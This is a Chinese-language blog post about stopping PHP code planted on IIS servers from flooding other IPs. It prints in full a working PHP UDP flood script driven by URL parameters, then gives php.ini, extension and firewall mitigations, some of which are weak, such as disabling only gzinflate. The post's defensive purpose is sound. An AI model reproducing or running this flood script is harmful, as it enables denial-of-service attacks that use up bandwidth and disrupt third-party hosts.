用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:

$packets = 0;

$ip = $_GET[\'ip\'];

$rand = $_GET[\'port\'];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();

print \"Flooded: $ip on port $rand

\";

$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){

$out .= \"X\";

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";

?>

表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:

禁止上述的代码:

在c:\windows\php.ini里设置:

disable_functions =gzinflate;

在c:\windows\php.ini里设其值为Off

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

前面的;号要保留

然后重启IIS

如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.

另外,对于没加密的php攻击代码,还可以用以下办法处理:

1.在IP策略,或防火墙中,禁止所有udp向外发送

2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词

php dos,防止用户利用PHP代码DOS造成用光网络带宽相关推荐

  1. 防止用户利用PHP代码DOS造成用光网络带宽

    用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 代码如下: $packets = 0; $ip = $_GET[\'ip\']; $rand = $_GET[\'por ...

  2. python dos攻击_利用SMB漏洞DoS攻击任何Windows系统

    原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...

  3. 手把手实战:利用LM神经网络算法自动识别窃电用户(附代码)

    来源:数据路 本文约3000字,建议阅读7分钟. 通过本文给大家介绍利用LM神经网络算法进行电力窃漏电用户的自动识别. 背景与挖掘目标 背景 传统的防窃漏电方法主要通过定期巡检.定期校验电表.用户举报 ...

  4. 用DOS命令来运行Java代码

    用DOS命令来运行Java代码.. ----------------- Demo.java public class Demo {public static void main(String[] ar ...

  5. 利用矮人Dos引导Linux

    利用Grub For Dos 可以很轻松的实现引导多系统,网上已经有很多文章介绍了.事实上除了利用Grub For Dos之外还可以利用矮人Dos进行引导,事实上矮人Dos也是基于Grub For D ...

  6. java keydown_利用Keydown事件阻止用户输入实现代码

    利用Keydown事件阻止用户输入实现代码 更新时间:2014年03月11日 16:38:29   作者: 这篇文章主要介绍了利用Keydown事件阻止用户输入的具体实现,需要的朋友可以参考下 先了解 ...

  7. c语言在dos下执行bat文件,应用dos批处理文件经常用到的DOS常用命令

    应用dos批处理文件经常用到的DOS常用命令 更新时间:2007年03月01日 00:00:00   作者: echo.@.call.pause.rem 是批处理文件最常用的几个命令,我们就从他们开始 ...

  8. dos盘启动计算机,最新万能 DOS 启动盘制作全攻略(软盘+光盘+U盘+硬盘+NTFS+应急实用工具)...

    最新万能 DOS 启动盘制作全攻略(软盘+光盘+U盘+硬盘+NTFS+应急实用工具) 更新时间:2006年12月21日 00:00:00   作者: 首先说明一下各种操作系统启动到DOS的途径: WI ...

  9. java wed登录面 代码_Java Web用户登录实例代码

    实现功能: 1.用户登陆.注销 2.利用session记录用户登陆信息 3.在JSP中展示已登陆用户信息 实现原理: 登陆后通过判断用户名和密码是否和存储的一致,如果一致,就把用户信息放到sessio ...

最新文章

  1. java 自然语言处理_Java自然语言处理
  2. 如何设计API返回码(错误码)?
  3. 聊聊 scala 的模式匹配
  4. Onenote 2010 多PC端笔记同步
  5. mysql 中遍历查询_mysql中循环查询
  6. Dev控件使用 - 皮肤
  7. Socket编程:之双机通信
  8. 手持移动扫描终端 PDA移动开单系统-批发零售管理
  9. vector容器的end是指向最后一个元素的下一个位置,使用时要将迭代器减1,才能获取到最后一个
  10. Vue项目报错:This relative module was not found
  11. 百度,在模仿和创新中成长
  12. 织梦login.php未安装,DedeCMS V5.7安装后登录后台显示空白解决办法
  13. You need to use a Theme.AppCompat theme
  14. VCPKG 升级问题
  15. win7系统关闭蓝牙服务器,Win7系统怎么关闭蓝牙功能
  16. 安卓版AWZ爱伪装一键新机说明
  17. 2021苹果最新供应链名单公布
  18. 使用tkinter canvas绘制中国象棋棋盘
  19. 三星云服务S Cloud亮相 与苹果iCloud为敌
  20. Java实现阿里云云通短信通知发送

热门文章

  1. STM32与宇电设备实现AI-BUS通讯
  2. 限流算法(漏桶算法、令牌桶算法)对比
  3. python什么教程好_Python基础教程哪个好
  4. 嵌入式操作系统_航天科工海鹰翼辉嵌入式操作系统获自主原创“身份证”
  5. python多久可以精通_学Python需要多久能学会?精通Python需要多长时间?
  6. 解决安卓项目显示cannot resolve symbol 'R'
  7. cad与连接mySQL数据库_跨服务器操作数据库?其实很简单!(下)
  8. java rhino 运行 js_Mozilla Rhino :如何从Java调用JS函数
  9. ntr模式_ntr什么意思?求详细解释。。。
  10. python numpy逆_numpy.linalg.inv返回奇异矩阵的逆函数 - python